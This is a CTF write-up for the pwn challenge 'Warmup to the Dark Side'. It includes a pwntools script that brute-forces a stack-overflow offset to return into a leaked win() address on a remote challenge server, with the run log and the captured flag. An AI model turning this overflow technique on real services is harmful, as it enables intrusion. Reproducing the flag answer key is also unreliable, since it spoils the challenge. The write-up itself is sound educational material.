Warmup to the Dark Side

Warmup to the Dark Side

April 6, 2022
1 min read
warmup-to-the-dark-side

Warmup to the Dark Side

Solver
e enscribe
Author
v10l3nt
Category
pwn
Points
100
Remote
nc 0.cloud.chals.io 30096
Flag
shctf{I_will_remov3_th3s3_restraints_and_leave_the_c3ll}

Once you start down the dark path, forever will it dominate your destiny. (And yes, the binary isn’t included)

Let’s run that netcat link to see what’s going on:

Terminal window
$ nc 0.cloud.chals.io 30096
The Dark Side Of The Force, Are They. Easily They Flow, Quick To Join You In A Fight. The Dark Side resides at: 0x55a6b42f020c
Jedi Mind tricks dont work on me >>>

We’re given an address of the win() function… and that’s it. If this is a ret2win challenge, how are we meant to find the offset of the $rip register and overflow it with our code? Of course… we need to brute force it.

In the code snippet below, I got the address provided in the prompt by reading the line and taking its substring (ASLR is enabled, so it’s different each time). Then, I slowly increased the buffer of the payload with a loop until I found the correct offset of the $rip:

solve.py
#!/usr/bin/env python3
from pwn import *
for i in range(32,128):
p = remote("0.cloud.chals.io", 30096)
address = p.readlineS()[112:126]
log.info("Trying offset " + str(i) + " for address " + address)
p.sendline(b'A'*i + p64(int(address, base=16)))
output = p.recvallS()
if "shctf" in output:
log.success(output)
break
p.close()

Let’s run this script on the server to see if we can get the flag:

Terminal window
[*] Trying offset 37 for address 0x55f788f1120c
[+] Receiving all data: Done (38B)
[*] Closed connection to 0.cloud.chals.io port 30096
[+] Opening connection to 0.cloud.chals.io on port 30096: Done
[*] Trying offset 38 for address 0x5631d523620c
[+] Receiving all data: Done (38B)
[*] Closed connection to 0.cloud.chals.io port 30096
[+] Opening connection to 0.cloud.chals.io on port 30096: Done
[*] Trying offset 39 for address 0x55980d2d520c
[+] Receiving all data: Done (38B)
[*] Closed connection to 0.cloud.chals.io port 30096
[+] Opening connection to 0.cloud.chals.io on port 30096: Done
[*] Trying offset 40 for address 0x55f0008b520c
[+] Receiving all data: Done (95B)
[*] Closed connection to 0.cloud.chals.io port 30096
[+] Jedi Mind tricks dont work on me >>>
shctf{I_will_remov3_th3s3_restraints_and_leave_the_c3ll}